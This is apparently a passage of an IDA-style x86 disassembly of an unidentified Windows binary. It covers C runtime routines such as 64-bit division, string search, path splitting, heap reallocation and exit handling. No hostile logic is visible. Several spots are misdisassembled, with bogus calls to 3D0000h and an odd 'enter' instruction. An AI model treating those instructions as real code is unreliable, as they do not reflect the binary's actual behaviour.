jnz short loc_411F94
mov [edi], edx
mov eax, [esp+0Ch+arg_0]
pop ebx
pop esi
pop edi
retn
; ---------------------------------------------------------------------------
loc_411FD8: ; CODE XREF: sub_411ED0+F4�j
mov [edi], dx
xor edx, edx
mov eax, [esp+0Ch+arg_0]
mov [edi+2], dl
pop ebx
pop esi
pop edi
retn
; ---------------------------------------------------------------------------
loc_411FE8: ; CODE XREF: sub_411ED0+EC�j
mov [edi], dx
mov eax, [esp+0Ch+arg_0]
pop ebx
pop esi
pop edi
retn
sub_411ED0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_412000 proc near ; CODE XREF: seg000:0040BBA0�p
; seg000:0040BBBE�p ...
arg_0 = dword ptr 8
arg_4 = byte ptr 0Ch
push ebp
mov ebp, esp
push edi
mov edi, [ebp+arg_0]
xor eax, eax
or ecx, 0FFFFFFFFh
repne scasb
inc ecx
neg ecx
dec edi
mov al, [ebp+arg_4]
std
repne scasb
inc edi
cmp [edi], al
jz short loc_412021
xor eax, eax
jmp short loc_412023
; ---------------------------------------------------------------------------
loc_412021: ; CODE XREF: sub_412000+1B�j
mov eax, edi
loc_412023: ; CODE XREF: sub_412000+1F�j
cld
pop edi
leave
retn
sub_412000 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_412027 proc near ; CODE XREF: sub_406DE8+6�p
; sub_406E06+4A�p ...
var_4 = byte ptr -4
var_3 = byte ptr -3
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
cmp ds:dword_45F8D0, 0
push ebx
push esi
push edi
jnz short loc_412054
mov eax, [ebp+arg_0]
cmp eax, 41h
jl loc_4120ED
cmp eax, 5Ah
jg loc_4120ED
add eax, 20h
jmp loc_4120ED
; ---------------------------------------------------------------------------
loc_412054: ; CODE XREF: sub_412027+E�j
mov ebx, [ebp+arg_0]
mov edi, 100h
push 1
cmp ebx, edi
pop esi
jge short loc_412088
cmp ds:dword_42E39C, esi
jle short loc_412076
push esi
push ebx
call sub_413446
pop ecx
pop ecx
jmp short loc_412080
; ---------------------------------------------------------------------------
loc_412076: ; CODE XREF: sub_412027+42�j
mov eax, ds:dword_42E190
mov al, [eax+ebx*2]
and eax, esi
loc_412080: ; CODE XREF: sub_412027+4D�j
test eax, eax
jnz short loc_412088
loc_412084: ; CODE XREF: sub_412027+AD�j
mov eax, ebx
jmp short loc_4120ED
; ---------------------------------------------------------------------------
loc_412088: ; CODE XREF: sub_412027+3A�j
; sub_412027+5B�j
mov edx, ds:dword_42E190
mov eax, ebx
sar eax, 8
movzx ecx, al
test byte ptr [edx+ecx*2+1], 80h
jz short loc_4120AC
and byte ptr [ebp+arg_0+2], 0
push 2
mov byte ptr [ebp+arg_0], al
mov byte ptr [ebp+arg_0+1], bl
pop eax
jmp short loc_4120B5
; ---------------------------------------------------------------------------
loc_4120AC: ; CODE XREF: sub_412027+74�j
and byte ptr [ebp+arg_0+1], 0
mov byte ptr [ebp+arg_0], bl
mov eax, esi
loc_4120B5: ; CODE XREF: sub_412027+83�j
push esi
push 0
lea ecx, [ebp+var_4]
push 3
push ecx
push eax
lea eax, [ebp+arg_0]
push eax
push edi
push ds:dword_45F8D0
call loc_416B94
add esp, 20h
test eax, eax
jz short loc_412084
cmp eax, esi
jnz short loc_4120E0
movzx eax, [ebp+var_4]
jmp short loc_4120ED
; ---------------------------------------------------------------------------
loc_4120E0: ; CODE XREF: sub_412027+B1�j
movzx eax, [ebp+var_3]
movzx ecx, [ebp+var_4]
shl eax, 8
or eax, ecx
loc_4120ED: ; CODE XREF: sub_412027+16�j
; sub_412027+1F�j ...
pop edi
pop esi
pop ebx
leave
retn
sub_412027 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_412100 proc near ; CODE XREF: sub_4078E6+3D�p
; sub_40867B+2D�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
arg_C = dword ptr 10h
push ebx
mov eax, [esp+4+arg_C]
or eax, eax
jnz short loc_412121
mov ecx, [esp+4+arg_8]
mov eax, [esp+4+arg_4]
xor edx, edx
div ecx
mov eax, [esp+4+arg_0]
div ecx
mov eax, edx
xor edx, edx
jmp short loc_412171
; ---------------------------------------------------------------------------
loc_412121: ; CODE XREF: sub_412100+7�j
mov ecx, eax
mov ebx, [esp+4+arg_8]
mov edx, [esp+4+arg_4]
mov eax, [esp+4+arg_0]
loc_41212F: ; CODE XREF: sub_412100+39�j
shr ecx, 1
rcr ebx, 1
shr edx, 1
rcr eax, 1
or ecx, ecx
jnz short loc_41212F
div ebx
mov ecx, eax
mul [esp+4+arg_C]
xchg eax, ecx
mul [esp+4+arg_8]
add edx, ecx
jb short loc_41215A
cmp edx, [esp+4+arg_4]
ja short loc_41215A
jb short loc_412162
cmp eax, [esp+4+arg_0]
jbe short loc_412162
loc_41215A: ; CODE XREF: sub_412100+4A�j
; sub_412100+50�j
sub eax, [esp+4+arg_8]
sbb edx, [esp+4+arg_C]
loc_412162: ; CODE XREF: sub_412100+52�j
; sub_412100+58�j
sub eax, [esp+4+arg_0]
sbb edx, [esp+4+arg_4]
neg edx
neg eax
sbb edx, 0
loc_412171: ; CODE XREF: sub_412100+1F�j
pop ebx
retn 10h
sub_412100 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_412180 proc near ; CODE XREF: sub_4078E6+24�p
; sub_40867B+3F�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
arg_C = dword ptr 10h
push ebx
push esi
mov eax, [esp+8+arg_C]
or eax, eax
jnz short loc_4121A2
mov ecx, [esp+8+arg_8]
mov eax, [esp+8+arg_4]
xor edx, edx
div ecx
mov ebx, eax
mov eax, [esp+8+arg_0]
div ecx
mov edx, ebx
jmp short loc_4121E3
; ---------------------------------------------------------------------------
loc_4121A2: ; CODE XREF: sub_412180+8�j
mov ecx, eax
mov ebx, [esp+8+arg_8]
mov edx, [esp+8+arg_4]
mov eax, [esp+8+arg_0]
loc_4121B0: ; CODE XREF: sub_412180+3A�j
shr ecx, 1
rcr ebx, 1
shr edx, 1
rcr eax, 1
or ecx, ecx
jnz short loc_4121B0
div ebx
mov esi, eax
mul [esp+8+arg_C]
mov ecx, eax
mov eax, [esp+8+arg_8]
mul esi
add edx, ecx
jb short loc_4121DE
cmp edx, [esp+8+arg_4]
ja short loc_4121DE
jb short loc_4121DF
cmp eax, [esp+8+arg_0]
jbe short loc_4121DF
loc_4121DE: ; CODE XREF: sub_412180+4E�j
; sub_412180+54�j
dec esi
loc_4121DF: ; CODE XREF: sub_412180+56�j
; sub_412180+5C�j
xor edx, edx
mov eax, esi
loc_4121E3: ; CODE XREF: sub_412180+20�j
pop esi
pop ebx
retn 10h
sub_412180 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4121E8 proc near ; CODE XREF: sub_40799C+1E3�p
; seg000:0040D857�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
push ecx
and [ebp+var_4], 0
push ebx
mov ebx, [ebp+arg_0]
push esi
push edi
push ebx
call sub_410B60
cmp eax, 1
pop ecx
jb short loc_412223
cmp byte ptr [ebx+1], 3Ah
jnz short loc_412223
mov esi, [ebp+arg_4]
test esi, esi
jz short loc_41221F
push 2
push ebx
push esi
call sub_4171C3
add esp, 0Ch
and byte ptr [esi+2], 0
loc_41221F: ; CODE XREF: sub_4121E8+25�j
inc ebx
inc ebx
jmp short loc_41222D
; ---------------------------------------------------------------------------
loc_412223: ; CODE XREF: sub_4121E8+18�j
; sub_4121E8+1E�j
mov eax, [ebp+arg_4]
test eax, eax
jz short loc_41222D
and byte ptr [eax], 0
loc_41222D: ; CODE XREF: sub_4121E8+39�j
; sub_4121E8+40�j
and [ebp+arg_4], 0
cmp byte ptr [ebx], 0
mov eax, ebx
mov esi, 0FFh
mov [ebp+arg_0], eax
jz short loc_4122A5
loc_412240: ; CODE XREF: sub_4121E8+87�j
mov cl, [eax]
movzx edx, cl
test ds:byte_460D81[edx], 4
jz short loc_412251
inc eax
jmp short loc_41226B
; ---------------------------------------------------------------------------
loc_412251: ; CODE XREF: sub_4121E8+64�j
cmp cl, 2Fh
jz short loc_412265
cmp cl, 5Ch
jz short loc_412265
cmp cl, 2Eh
jnz short loc_41226B
mov [ebp+var_4], eax
jmp short loc_41226B
; ---------------------------------------------------------------------------
loc_412265: ; CODE XREF: sub_4121E8+6C�j
; sub_4121E8+71�j
lea ecx, [eax+1]
mov [ebp+arg_4], ecx
loc_41226B: ; CODE XREF: sub_4121E8+67�j
; sub_4121E8+76�j ...
inc eax
cmp byte ptr [eax], 0
jnz short loc_412240
mov edi, [ebp+arg_4]
mov [ebp+arg_0], eax
test edi, edi
jz short loc_4122A5
cmp [ebp+arg_8], 0
jz short loc_4122A0
sub edi, ebx
cmp edi, esi
jb short loc_412289
mov edi, esi
loc_412289: ; CODE XREF: sub_4121E8+9D�j
push edi
push ebx
push [ebp+arg_8]
call sub_4171C3
mov eax, [ebp+arg_8]
add esp, 0Ch
and byte ptr [edi+eax], 0
mov eax, [ebp+arg_0]
loc_4122A0: ; CODE XREF: sub_4121E8+97�j
mov ebx, [ebp+arg_4]
jmp short loc_4122AF
; ---------------------------------------------------------------------------
loc_4122A5: ; CODE XREF: sub_4121E8+56�j
; sub_4121E8+91�j
mov ecx, [ebp+arg_8]
test ecx, ecx
jz short loc_4122AF
and byte ptr [ecx], 0
loc_4122AF: ; CODE XREF: sub_4121E8+BB�j
; sub_4121E8+C2�j
mov edi, [ebp+var_4]
test edi, edi
jz short loc_412302
cmp edi, ebx
jb short loc_412302
cmp [ebp+arg_C], 0
jz short loc_4122DF
sub edi, ebx
cmp edi, esi
jb short loc_4122C8
mov edi, esi
loc_4122C8: ; CODE XREF: sub_4121E8+DC�j
push edi
push ebx
push [ebp+arg_C]
call sub_4171C3
mov eax, [ebp+arg_C]
add esp, 0Ch
and byte ptr [edi+eax], 0
mov eax, [ebp+arg_0]
loc_4122DF: ; CODE XREF: sub_4121E8+D6�j
mov edi, [ebp+arg_10]
test edi, edi
jz short loc_41232A
sub eax, [ebp+var_4]
cmp eax, esi
jnb short loc_4122EF
mov esi, eax
loc_4122EF: ; CODE XREF: sub_4121E8+103�j
push esi
push [ebp+var_4]
push edi
call sub_4171C3
add esp, 0Ch
and byte ptr [esi+edi], 0
jmp short loc_41232A
; ---------------------------------------------------------------------------
loc_412302: ; CODE XREF: sub_4121E8+CC�j
; sub_4121E8+D0�j
mov edi, [ebp+arg_C]
test edi, edi
jz short loc_412320
sub eax, ebx
cmp eax, esi
jnb short loc_412311
mov esi, eax
loc_412311: ; CODE XREF: sub_4121E8+125�j
push esi
push ebx
push edi
call sub_4171C3
add esp, 0Ch
and byte ptr [esi+edi], 0
loc_412320: ; CODE XREF: sub_4121E8+11F�j
mov eax, [ebp+arg_10]
test eax, eax
jz short loc_41232A
and byte ptr [eax], 0
loc_41232A: ; CODE XREF: sub_4121E8+FC�j
; sub_4121E8+118�j ...
pop edi
pop esi
pop ebx
leave
retn
sub_4121E8 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41232F proc near ; CODE XREF: sub_407E82+19�p
; sub_40E321+1C�p
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 20h
mov eax, [ebp+arg_0]
push esi
push [ebp+arg_C]
mov [ebp+var_18], eax
mov [ebp+var_20], eax
mov eax, [ebp+arg_4]
push [ebp+arg_8]
mov [ebp+var_1C], eax
lea eax, [ebp+var_20]
mov [ebp+var_14], 42h
push eax
call sub_412C3C
add esp, 0Ch
dec [ebp+var_1C]
mov esi, eax
js short loc_41236D
mov eax, [ebp+var_20]
and byte ptr [eax], 0
jmp short loc_41237A
; ---------------------------------------------------------------------------
loc_41236D: ; CODE XREF: sub_41232F+34�j
lea eax, [ebp+var_20]
push eax
push 0
call sub_412B27
pop ecx
pop ecx
loc_41237A: ; CODE XREF: sub_41232F+3C�j
mov eax, esi
pop esi
leave
retn
sub_41232F endp
; =============== S U B R O U T I N E =======================================
sub_41237F proc near ; CODE XREF: seg000:0040810E�p
; sub_411613+35�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push ebx
mov ebx, [esp+4+arg_0]
push ebp
push esi
test ebx, ebx
push edi
jnz short loc_41239A
push [esp+10h+arg_4]
call sub_410C0F
pop ecx
jmp loc_41249A
; ---------------------------------------------------------------------------
loc_41239A: ; CODE XREF: sub_41237F+A�j
mov esi, [esp+10h+arg_4]
test esi, esi
jnz short loc_4123B0
push ebx
call sub_410C83
pop ecx
loc_4123A9: ; CODE XREF: sub_41237F+114�j
xor eax, eax
jmp loc_41249A
; ---------------------------------------------------------------------------
loc_4123B0: ; CODE XREF: sub_41237F+21�j
; sub_41237F+10E�j
xor edi, edi
cmp esi, 0FFFFFFE0h
ja loc_41247B
push ebx
call sub_413550
mov ebp, eax
pop ecx
test ebp, ebp
jz loc_412458
cmp esi, ds:dword_42E3AC
ja short loc_412418
push esi
push ebx
push ebp
call sub_413D5B
add esp, 0Ch
test eax, eax
jz short loc_4123E7
mov edi, ebx
jmp short loc_412410
; ---------------------------------------------------------------------------
loc_4123E7: ; CODE XREF: sub_41237F+62�j
push esi
call sub_4138A6
mov edi, eax
pop ecx
test edi, edi
jz short loc_412418
mov eax, [ebx-4]
dec eax
cmp eax, esi
jb short loc_4123FE
mov eax, esi
loc_4123FE: ; CODE XREF: sub_41237F+7B�j
push eax
push ebx
push edi
call sub_4105F0
push ebx
push ebp
call sub_41357B
add esp, 14h
loc_412410: ; CODE XREF: sub_41237F+66�j
test edi, edi
jnz loc_412498
loc_412418: ; CODE XREF: sub_41237F+53�j
; sub_41237F+73�j
test esi, esi
jnz short loc_41241F
push 1
pop esi
loc_41241F: ; CODE XREF: sub_41237F+9B�j
add esi, 0Fh
and esi, 0FFFFFFF0h
push esi
push 0
push ds:dword_460EA0
call ds:dword_41C134 ; RtlAllocateHeap
mov edi, eax
test edi, edi
jz short loc_41247B
mov eax, [ebx-4]
dec eax
cmp eax, esi
jb short loc_412444
mov eax, esi
loc_412444: ; CODE XREF: sub_41237F+C1�j
push eax
push ebx
push edi
call sub_4105F0
push ebx
push ebp
call sub_41357B
add esp, 14h
jmp short loc_412477
; ---------------------------------------------------------------------------
loc_412458: ; CODE XREF: sub_41237F+47�j
test esi, esi
jnz short loc_41245F
push 1
pop esi
loc_41245F: ; CODE XREF: sub_41237F+DB�j
add esi, 0Fh
and esi, 0FFFFFFF0h
push esi
push ebx
push 0
push ds:dword_460EA0
call ds:dword_41C148 ; RtlReAllocateHeap
mov edi, eax
loc_412477: ; CODE XREF: sub_41237F+D7�j
test edi, edi
jnz short loc_412498
loc_41247B: ; CODE XREF: sub_41237F+36�j
; sub_41237F+B9�j
cmp ds:dword_45F89C, 0
jz short loc_412498
push esi
call sub_4134BB
test eax, eax
pop ecx
jnz loc_4123B0
jmp loc_4123A9
; ---------------------------------------------------------------------------
loc_412498: ; CODE XREF: sub_41237F+93�j
; sub_41237F+FA�j ...
mov eax, edi
loc_41249A: ; CODE XREF: sub_41237F+16�j
; sub_41237F+2C�j
pop edi
pop esi
pop ebp
pop ebx
retn
sub_41237F endp
; =============== S U B R O U T I N E =======================================
sub_41249F proc near ; CODE XREF: sub_408661+8�p
arg_0 = dword ptr 4
arg_4 = byte ptr 8
push [esp+arg_0]
call ds:dword_41C07C ; GetFileAttributesA
cmp eax, 0FFFFFFFFh
jnz short loc_4124BF
call ds:dword_41C068 ; RtlGetLastWin32Error
push eax
call sub_41724D
pop ecx
loc_4124BB: ; CODE XREF: sub_41249F+3F�j
or eax, 0FFFFFFFFh
retn
; ---------------------------------------------------------------------------
loc_4124BF: ; CODE XREF: sub_41249F+D�j
test al, 1
jz short loc_4124E0
test [esp+arg_4], 2
jz short loc_4124E0
mov ds:dword_45F844, 0Dh
mov ds:dword_45F848, 5
jmp short loc_4124BB
; ---------------------------------------------------------------------------
loc_4124E0: ; CODE XREF: sub_41249F+22�j
; sub_41249F+29�j
xor eax, eax
retn
sub_41249F endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_4124F0 proc near ; CODE XREF: sub_40878B+5F�p
; sub_40878B+90�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
arg_C = dword ptr 10h
push edi
push esi
push ebx
xor edi, edi
mov eax, [esp+0Ch+arg_4]
or eax, eax
jge short loc_412511
inc edi
mov edx, [esp+0Ch+arg_0]
neg eax
neg edx
sbb eax, 0
mov [esp+0Ch+arg_4], eax
mov [esp+0Ch+arg_0], edx
loc_412511: ; CODE XREF: sub_4124F0+B�j
mov eax, [esp+0Ch+arg_C]
or eax, eax
jge short loc_41252D
inc edi
mov edx, [esp+0Ch+arg_8]
neg eax
neg edx
sbb eax, 0
mov [esp+0Ch+arg_C], eax
mov [esp+0Ch+arg_8], edx
loc_41252D: ; CODE XREF: sub_4124F0+27�j
or eax, eax
jnz short loc_412549
mov ecx, [esp+0Ch+arg_8]
mov eax, [esp+0Ch+arg_4]
xor edx, edx
div ecx
mov ebx, eax
mov eax, [esp+0Ch+arg_0]
div ecx
mov edx, ebx
jmp short loc_41258A
; ---------------------------------------------------------------------------
loc_412549: ; CODE XREF: sub_4124F0+3F�j
mov ebx, eax
mov ecx, [esp+0Ch+arg_8]
mov edx, [esp+0Ch+arg_4]
mov eax, [esp+0Ch+arg_0]
loc_412557: ; CODE XREF: sub_4124F0+71�j
shr ebx, 1
rcr ecx, 1
shr edx, 1
rcr eax, 1
or ebx, ebx
jnz short loc_412557
div ecx
mov esi, eax
mul [esp+0Ch+arg_C]
mov ecx, eax
mov eax, [esp+0Ch+arg_8]
mul esi
add edx, ecx
jb short loc_412585
cmp edx, [esp+0Ch+arg_4]
ja short loc_412585
jb short loc_412586
cmp eax, [esp+0Ch+arg_0]
jbe short loc_412586
loc_412585: ; CODE XREF: sub_4124F0+85�j
; sub_4124F0+8B�j
dec esi
loc_412586: ; CODE XREF: sub_4124F0+8D�j
; sub_4124F0+93�j
xor edx, edx
mov eax, esi
loc_41258A: ; CODE XREF: sub_4124F0+57�j
dec edi
jnz short loc_412594
neg edx
neg eax
sbb edx, 0
loc_412594: ; CODE XREF: sub_4124F0+9B�j
pop ebx
pop esi
pop edi
retn 10h
sub_4124F0 endp
; ---------------------------------------------------------------------------
db 0A1h ; ¡
db 5Ch ; \
db 0E1h ; á
db 42h ; B
db 0
db 85h ; …
db 0C0h ; À
db 74h ; t
db 2
db 0FFh
db 0D0h ; Ð
db 68h ; h
db 24h ; $
db 0E0h ; à
db 41h ; A
db 0
db 68h ; h
db 10h
db 0E0h ; à
db 41h ; A
db 0
db 0E8h ; è
db 0CEh ; Î
db 0
db 0
db 0
db 68h ; h
db 0Ch
db 0E0h ; à
db 41h ; A
db 0
db 68h ; h
db 0
db 0E0h ; à
db 41h ; A
db 0
db 0E8h ; è
db 0BFh ; ¿
db 0
db 0
db 0
db 83h ; ƒ
db 0C4h ; Ä
db 10h
db 0C3h ; Ã
; ---------------------------------------------------------------------------
push 0
push 0
push dword ptr [esp+0Ch]
call sub_4125E9
add esp, 0Ch
retn
; =============== S U B R O U T I N E =======================================
sub_4125D8 proc near ; CODE XREF: sub_4155EC+33F6�p
; sub_41A044+84�p
arg_0 = dword ptr 4
push 0
push 1
push [esp+8+arg_0]
call sub_4125E9
add esp, 0Ch
retn
sub_4125D8 endp
; =============== S U B R O U T I N E =======================================
sub_4125E9 proc near ; CODE XREF: seg000:004125CF�p
; sub_4125D8+8�p
arg_0 = dword ptr 4
arg_8 = dword ptr 0Ch
push edi
push 1
pop edi
cmp ds:dword_45F88C, edi
jnz short near ptr loc_412605+1
push [esp+4+arg_0]
call near ptr 3D0000h
jno short near ptr loc_41264E+2
call near ptr 3D0000h
loc_412605: ; CODE XREF: sub_4125E9+A�j
rol dword ptr [ebx+0C247Ch], 1
push ebx
mov ebx, [esp+8+arg_8]
mov ds:dword_45F888, edi
mov ds:byte_45F884, bl
jnz short loc_41265A
mov eax, ds:dword_460EB4
test eax, eax
jz short loc_412649
mov ecx, ds:dword_460EB0
push esi
lea esi, [ecx-4]
cmp esi, eax
jb short loc_412648
loc_412635: ; CODE XREF: sub_4125E9+5D�j
mov eax, [esi]
test eax, eax
jz short loc_41263D
call eax
loc_41263D: ; CODE XREF: sub_4125E9+50�j
sub esi, 4
cmp esi, ds:dword_460EB4
jnb short loc_412635
loc_412648: ; CODE XREF: sub_4125E9+4A�j
pop esi
loc_412649: ; CODE XREF: sub_4125E9+3C�j
push offset dword_41E030
loc_41264E: ; CODE XREF: sub_4125E9+15�j
push offset dword_41E028
call sub_412682
pop ecx
pop ecx
loc_41265A: ; CODE XREF: sub_4125E9+33�j
push offset dword_41E03C
push offset dword_41E034
call sub_412682
pop ecx
pop ecx
test ebx, ebx
pop ebx
jnz short loc_412680
push [esp+4+arg_0]
mov ds:dword_45F88C, edi
call ds:dword_41C0F8 ; ExitProcess
loc_412680: ; CODE XREF: sub_4125E9+85�j
pop edi
retn
sub_4125E9 endp
; =============== S U B R O U T I N E =======================================
sub_412682 proc near ; CODE XREF: sub_4125E9+6A�p
; sub_4125E9+7B�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push esi
mov esi, [esp+4+arg_0]
loc_412687: ; CODE XREF: sub_412682+16�j
cmp esi, [esp+4+arg_4]
jnb short loc_41269A
mov eax, [esi]
test eax, eax
jz short loc_412695
call eax
loc_412695: ; CODE XREF: sub_412682+F�j
add esi, 4
jmp short loc_412687
; ---------------------------------------------------------------------------
loc_41269A: ; CODE XREF: sub_412682+9�j
pop esi
retn
sub_412682 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41269C proc near ; CODE XREF: seg000:0040CEC6�p
; seg000:0040CEF5�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
cmp [ebp+arg_4], 0
push ebx
mov ebx, [ebp+arg_0]
push edi
mov edi, ebx
jg short loc_4126B0
xor eax, eax
jmp short loc_4126E6
; ---------------------------------------------------------------------------
loc_4126B0: ; CODE XREF: sub_41269C+E�j
dec [ebp+arg_4]
push esi
jz short loc_4126E0
mov esi, [ebp+arg_8]
loc_4126B9: ; CODE XREF: sub_41269C+42�j
dec dword ptr [esi+4]
js short loc_4126C8
mov ecx, [esi]
movzx eax, byte ptr [ecx]
inc ecx
mov [esi], ecx
jmp short loc_4126CF
; ---------------------------------------------------------------------------
loc_4126C8: ; CODE XREF: sub_41269C+20�j
push esi
call sub_4164EB
pop ecx
loc_4126CF: ; CODE XREF: sub_41269C+2A�j
cmp eax, 0FFFFFFFFh
jz short loc_4126EA
mov [edi], al
inc edi
cmp al, 0Ah
jz short loc_4126E0
dec [ebp+arg_4]
jnz short loc_4126B9
loc_4126E0: ; CODE XREF: sub_41269C+18�j
; sub_41269C+3D�j ...
and byte ptr [edi], 0
loc_4126E3: ; CODE XREF: sub_41269C+55�j
mov eax, ebx
pop esi
loc_4126E6: ; CODE XREF: sub_41269C+12�j
pop edi
pop ebx
pop ebp
retn
; ---------------------------------------------------------------------------
loc_4126EA: ; CODE XREF: sub_41269C+36�j
cmp edi, [ebp+arg_0]
jnz short loc_4126E0
xor ebx, ebx
jmp short loc_4126E3
sub_41269C endp
; =============== S U B R O U T I N E =======================================
sub_4126F3 proc near ; CODE XREF: seg000:0040B597�p
arg_0 = dword ptr 4
push [esp+arg_0]
call near ptr 3D0000h
enter 0FFFFC085h, 75h
or bh, bh
adc eax, offset dword_41C068
jmp short loc_41270B
; ---------------------------------------------------------------------------
xor eax, eax
loc_41270B: ; CODE XREF: sub_4126F3+14�j
test eax, eax
jz short loc_41271A
push eax
call sub_41724D
pop ecx
or eax, 0FFFFFFFFh
retn
; ---------------------------------------------------------------------------
loc_41271A: ; CODE XREF: sub_4126F3+1A�j
xor eax, eax
retn
sub_4126F3 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41271D proc near ; CODE XREF: seg000:0040B4EE�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = byte ptr 10h
push ebp
mov ebp, esp
push esi
push edi
push [ebp+arg_0]
call sub_4172B4
mov esi, eax
lea eax, [ebp+arg_8]
push eax
push [ebp+arg_4]
push [ebp+arg_0]
call sub_412C3C
push [ebp+arg_0]
mov edi, eax
push esi
call sub_417341
add esp, 18h
mov eax, edi
pop edi
pop esi
pop ebp
retn
sub_41271D endp
; ---------------------------------------------------------------------------
align 10h
; START OF FUNCTION CHUNK FOR sub_412760
loc_412750: ; CODE XREF: sub_412760+1D�j
lea eax, [edx-1]
pop ebx
retn
; END OF FUNCTION CHUNK FOR sub_412760
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_412760 proc near ; CODE XREF: seg000:0040979F�p
; seg000:00409846�p ...
arg_0 = dword ptr 4
arg_4 = byte ptr 8
; FUNCTION CHUNK AT 00412750 SIZE 00000005 BYTES
xor eax, eax
mov al, [esp+arg_4]
loc_412766: ; CODE XREF: sub_410AE0+6E�j
push ebx
mov ebx, eax
shl eax, 8
mov edx, [esp+4+arg_0]
test edx, 3
jz short loc_41278B
loc_412778: ; CODE XREF: sub_412760+29�j
mov cl, [edx]
inc edx
cmp cl, bl
jz short loc_412750
test cl, cl
jz short loc_4127D4
test edx, 3
jnz short loc_412778
loc_41278B: ; CODE XREF: sub_412760+16�j
or ebx, eax
push edi
mov eax, ebx
shl ebx, 10h
push esi
or ebx, eax
loc_412796: ; CODE XREF: sub_412760+61�j
; sub_412760+70�j ...
mov ecx, [edx]
mov edi, 7EFEFEFFh
mov eax, ecx
mov esi, edi
xor ecx, ebx
add esi, eax
add edi, ecx
xor ecx, 0FFFFFFFFh
xor eax, 0FFFFFFFFh
xor ecx, edi
xor eax, esi
add edx, 4
and ecx, 81010100h
jnz short loc_4127D8
and eax, 81010100h
jz short loc_412796
and eax, 1010100h
jnz short loc_4127D2
and esi, 80000000h
jnz short loc_412796
loc_4127D2: ; CODE XREF: sub_412760+68�j
; sub_412760+81�j ...
pop esi
pop edi
loc_4127D4: ; CODE XREF: sub_412760+21�j
pop ebx
xor eax, eax
retn
; ---------------------------------------------------------------------------
loc_4127D8: ; CODE XREF: sub_412760+5A�j
mov eax, [edx-4]
cmp al, bl
jz short loc_412815
test al, al
jz short loc_4127D2
cmp ah, bl
jz short loc_41280E
test ah, ah
jz short loc_4127D2
shr eax, 10h
cmp al, bl
jz short loc_412807
test al, al
jz short loc_4127D2
cmp ah, bl
jz short loc_412800
test ah, ah
jz short loc_4127D2
jmp short loc_412796
; ---------------------------------------------------------------------------
loc_412800: ; CODE XREF: sub_412760+98�j
pop esi
pop edi
lea eax, [edx-1]
pop ebx
retn
; ---------------------------------------------------------------------------
loc_412807: ; CODE XREF: sub_412760+90�j
lea eax, [edx-2]
pop esi
pop edi
pop ebx
retn
; ---------------------------------------------------------------------------
loc_41280E: ; CODE XREF: sub_412760+85�j
lea eax, [edx-3]
pop esi
pop edi
pop ebx
retn
; ---------------------------------------------------------------------------
loc_412815: ; CODE XREF: sub_412760+7D�j
lea eax, [edx-4]
pop esi
pop edi
pop ebx
retn
sub_412760 endp
; ---------------------------------------------------------------------------
align 10h
mov eax, [esp+0Ch]
test eax, eax
jz short locret_41286C
mov edx, [esp+4]
push esi
push edi
mov esi, edx
mov edi, [esp+10h]
or edx, edi
and edx, 3
jz short loc_41286D
test eax, 1
jz short loc_41284D
mov cl, [esi]
cmp cl, [edi]
jnz short loc_41289A
inc esi
inc edi
dec eax
jz short loc_41286A
loc_41284D: ; CODE XREF: seg000:00412840�j
; seg000:00412868�j
mov cl, [esi]
mov dl, [edi]
cmp cl, dl
jnz short loc_41289A
mov cl, [esi+1]
mov dl, [edi+1]
cmp cl, dl
jnz short loc_41289A
add edi, 2
add esi, 2
sub eax, 2
jnz short loc_41284D
loc_41286A: ; CODE XREF: seg000:0041284B�j
; seg000:004128A4�j
pop edi
pop esi
locret_41286C: ; CODE XREF: seg000:00412826�j
retn
; ---------------------------------------------------------------------------
loc_41286D: ; CODE XREF: seg000:00412839�j
mov ecx, eax
and eax, 3
shr ecx, 2
jz short loc_4128A2
repe cmpsd
jz short loc_4128A2
mov ecx, [esi-4]
mov edx, [edi-4]
cmp cl, dl
jnz short loc_412895
cmp ch, dh
jnz short loc_412895
shr ecx, 10h
shr edx, 10h
cmp cl, dl
jnz short loc_412895
cmp ch, dh
loc_412895: ; CODE XREF: seg000:00412883�j
; seg000:00412887�j ...
mov eax, 0
loc_41289A: ; CODE XREF: seg000:00412846�j
; seg000:00412853�j ...
sbb eax, eax
pop edi
sbb eax, 0FFFFFFFFh
pop esi
retn
; ---------------------------------------------------------------------------
loc_4128A2: ; CODE XREF: seg000:00412875�j
; seg000:00412879�j
test eax, eax
jz short loc_41286A
mov edx, [esi]
mov ecx, [edi]
cmp dl, cl
jnz short loc_412895
dec eax
jz short loc_4128C9
cmp dh, ch
jnz short loc_412895
dec eax
jz short loc_4128C9
and ecx, 0FF0000h
and edx, 0FF0000h
cmp edx, ecx
jnz short loc_412895
dec eax
